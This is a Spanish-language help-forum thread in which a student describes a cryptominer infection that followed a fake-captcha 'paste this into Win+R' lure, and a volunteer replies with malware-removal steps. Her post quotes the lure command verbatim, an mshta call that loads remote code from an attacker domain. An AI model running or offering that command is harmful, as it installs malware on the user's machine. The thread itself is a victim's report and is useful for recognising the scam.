Problema de posible malware

Eliminar Malwares
1

Necesito ayuda, lo ruego por favor Necesito ayuda, hace poco he comenzado a tener problemas com mi laptop, el cpu esta al 100%, se abren ventanas en negro de la nada y es molesto, tengo capturas Ahora ultimo he estado viendo y avast detecto un archivo malicioso, que de manera manual, elimine, pero siguen mas Un tal rave tambien aparece con hidden al inicio, lo encontre y elimine, pero continua de esta misma forma Al principio aparecio como un caballo de troya, que he de suponer, lo siguiente continuo desde eso, pues hace poco investigando una pagina oficial de un colegio, me salio un catcha, raro porque ya antes habia entrado y no pedia, luego me salia erros y me pedia que ingresara a win+r y pusiera un codigo o algo del estilo, desde ahi comenzaron los problemas Mas lento, menos duradera la carga, luego aparecian unas pantallas de powershell o algo asi en negro, dos veces logre ver y tenian simbolos, investigando era algo de mineria de criptomonedas Rave borre, y el archivo de criptomonedas, pero continua Revisando autoruns, aparecen varios archivos como file not found en system 32, todo como estos o parecidos: wowarmhw, wow64, o parecidos pero llevan wow, o xtajit He realizado con malwarebytes, avast en modo seguro, pero no aparece nada, todo normal, segun En los archivos run (quiero aclarar, no soy nada parecido a ingeniera en sistemas ni nada, solo una estudiante que no tiene nada que ver con computacion o cosas asi) aparecia algo relacionado a powershell, archivos que no tienen nada que ver con los originales, de igual forma los elimine En el administrador de tareas, aparecia uno llamado Powershell que ocupaba bastante cpu, pero al rato no aparecio mas Cuando pongo win+r aparece el archivo el cual, he de suponer porque avast cuando le di click al damre cuenta lo tacho como malicioso, no se si lo puedo poner o no pero igualmente, es este: mshta https://windowsdnsservicereload.icu/verifycations/1056.html # “Microsoft Windows: DNS service Reload and Restart UP” Ahora que he investigado tiene que ver algo con Host, y mas raro, porque de la nada en el adm. de tareas aparecen muchos host Necesito ayuda, no se si me he pasado algo pero espero que todoe sto pueda tener arreglo Aparte, cuando intento abrir Rkill, o hitmanpro no abren, ni como administrador, tampoco abria autoruns o parecidos.

Pd: revisando las capturas, tambien aparecia ese recuadro negro como monitor_5309.ps1 con unos simbolos raros, en appdata/local/myapp/xrimg.exe no se que es xrimg Pd2: BV:Miner-HA (PUP) nombre del archivo que encontro avast, me acuerdo haberlo eliminado, pero no estoy segura Pd3: leyendo en informes de windows de personas aleatorias, les pasa lo mismo,cuando abro el adm. de tareas, sale un programa llaamdo interrupciones del sistema, que ocupa hasta el 100% del cpu, y no solo es esa, si no que varios “programas” salen asi, y desaparecen al toque Esto ocurre en “simbolo del sistema” o algo asi se llama el programa Es la segunda vez que lo subo, necesito ayuda

1 me gusta
2

Hola @daniella_0938

Realiza los siguientes pasos:

(Mantén conectados todos tus dispositivos externos que tengas como: USBs, discos duros externos, etc).

Por favor, descarga todo el software de los enlaces que pongo/de sus respectivos manuales.

Ahora ejecutarás una serie de herramientas respetando el orden los pasos con todos los programas cerrados incluidos los navegadores.

Conectas todos tus dispositivos externos (todos los discos duros externos que tengas, así como todas las USB que tengas y discos duros externos si también tienes.

Realiza los pasos que te pongo a continuación, sin cambiar el orden y síguelos al pie de la letra:

0) Descarga Ccleaner . Aquí te dejo su manual: Manual de CCleaner , para que sepas como usarlo y configurarlo correctamente.

Lo instalas y lo ejecutas. En la pestaña Limpieza personalizada dejas la configuración predeterminada. Haces clic en Analizar y esperas a que termine. Seguidamente haz clic en Ejecutar Limpiador. Clic en la pestaña Registro > clic en Buscar Problemas esperas que termine. Finalmente clic en Reparar Seleccionadas y realizas una Copia de Seguridad del registro de Windows.

1) Descarga, instala, actualiza y ejecuta Malwarebytes’ Anti-Malware. Aquí te dejo su manual: Manual de Malwarebytes , para que sepas como usarlo y configurarlo correctamente.

  • Realizas un Análisis Personalizado, marcando Todas las casillas (menos la que dice analizar rootkits) de la Derecha y de la Izquierda, actualizando si te lo pide. Es decir: conectas todos tus dispositivos externos (todos los discos duros externos que tengas, así como todas las USB que tengas y marcas todas las unidades de disco disponibles y las siguientes casillas:
  1. Analizar objetos en memoria
  2. Analizar configuracion de inicio y registro
  3. Analizar dentro de los archivos
  • Pulsar en “Eliminar Seleccionados” para enviar las infecciones a la cuarentena y Reinicias el ordenador.
  • Para acceder posteriormente al informe del análisis te diriges a: Informes >> Registro de análisis >> pulsas en Exportar >> Copiar al Portapapeles y pones el informe en tu próxima respuesta.

2) Descarga Adwcleaner en el escritorio.

  • Desactiva tu antivirus :arrow_forward: Como deshabilitar temporalmente un antivirus y cualquier programa de seguridad que tengas activado.
  • Ejecuta Adwcleaner.exe (Si usas Windows Vista/7/8 u 10 presiona clic derecho y selecciona “Ejecutar como Administrador.”)
  • Pulsar en el botón Analizar Ahora, y espera a que se termine el análisis. Inmediatamente pulsa sobre el botón Iniciar Reparación.
  • Espera a que termine y sigue las instrucciones que te aparezcan. Si te pidiera Reiniciar, pues reinicias el ordenador pulsando en Aceptar.
  • Si no encuentra nada, pulsa en Omitir Reparación.
  • El log lo encontrarás en la pestaña Informes, volviendo a abrir el programa, si es necesario o en la siguiente ubicación: C:\AdwCleaner\Logs\AdwCleaner[C0].txt.
  • Para más información aquí te dejo su manual: Manual de Adwcleaner .
  • Activa de nuevo tu antivirus y cualquier programa de seguridad que tengas activado.

3) Descarga FMRS a tu escritorio

  • Desactiva tu antivirus :arrow_forward: Como deshabilitar temporalmente un antivirus y cualquier programa de seguridad que tengas activado.
  • Ejecuta FMRS.exe (Presiona clic derecho y selecciona “Ejecutar como Administrador.”)
  • Aceptas los disclaimers que aparezcan.
  • Esperas que termine.
  • Al finalizar generara un reporte que deberás pegar en tu próxima respuesta.
  • Activa nuevamente tu antivirus

4) Utiliza nuevamente CCleaner tal como te dije en el punto 0.

Pegas los reportes de Malwarebytes, AdwCleaner y FMRS y comentas como va el problema inicial planteado por el cual abriste este tema. También responde a las preguntas que te haya realizado a lo largo de este Post, siempre que te haya hecho alguna, si no, no

NOTA IMPORTANTE

Por Favor, mientras estemos desinfectando tu maquina o terminando de hacerlo:

  • No realices pasos/acciones que NOSOTROS no te hayamos indicado.
  • No descargues NADA de Internet y/o conectes dispositivos externos a tu equipo.
  • No instales NADA (programas/software/complementos/extensiones del navegador…).
  • No ejecutes otros programas de seguridad (Antivirus, Antimalware, ANTINADA…).
  • No realices por tu cuenta otros procedimientos.
  • Usa tu equipo EXCLUSIVAMENTE para desinfectarlo siguiendo nuestras indicaciones.

:warning: Muy Importante :warning: Coloca los diferentes reportes que te he pedido como se muestra en la siguiente imagen:

report
report703×272 3.69 KB

Salu2.

3

Muchas gracias, lo voy a intentar y comentare en que resulto.

1 me gusta